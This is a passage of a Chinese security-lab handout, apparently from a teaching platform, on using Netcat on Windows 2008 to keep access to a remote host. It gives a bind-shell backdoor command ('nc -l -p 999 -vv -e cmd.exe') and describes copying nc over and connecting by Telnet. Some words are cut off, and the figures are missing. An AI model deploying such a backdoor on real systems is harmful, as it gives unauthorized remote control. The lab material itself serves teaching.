NC 连接实验步骤(win2008)
实验环境来源:西普信息安全实验教学系统
摘 要:NC 连接能够建立并接受传输控制协议TC)和用户数据报协议UD)的连接,Netcat
可在这些连接上读写数据,直到连接关闭为止。本文主要讲述了 NC 连接实验步骤
关键词:NC 连接;远程控制;NC 命令
1 实验步骤
(1) 获得远程主机的 shell
使用已知的方法获取远程主机的 Shell(利用实验台实验时可以直接利用实验台的实验工具箱下载 nc
程序,可跳过 1、2 步)。
图 1 实验的网络拓扑图
(2) 拷贝 nc 程序
命令行下拷贝远程文件主要有以下几种方法:
p 服务,在远程命令行下使用 p 命令下载文件,p 使用 TCP 协议作为文件传输协议。
tp 服务,tp 类似于 FTP,它使用 UDP 协议作为传输协议。
共享目录拷贝。
(3) 运行 nc
NC 功能强大,可以运行在监听状态,等待远程连接,从而起到后门的作用,具体命令如下: nc –l –p
999 –vv –e cmd.exe,其中 999 为本地监听的供远程主机连接的端口,如下图所示。
图 2 NC 功能强大,可以运行在监听状态,等待远程连接
(4) 远程连接
本地使用 Telnet 连接远程 nc 所监听的 999 端口,如下图所示。
图 3 本地使用 Telnet 连接远程 nc 所监听的 999 端口
稍等几秒钟,则会显示远程主机的命令行,如下图所示。
1 / 2
NC 连接实验步骤(win2008)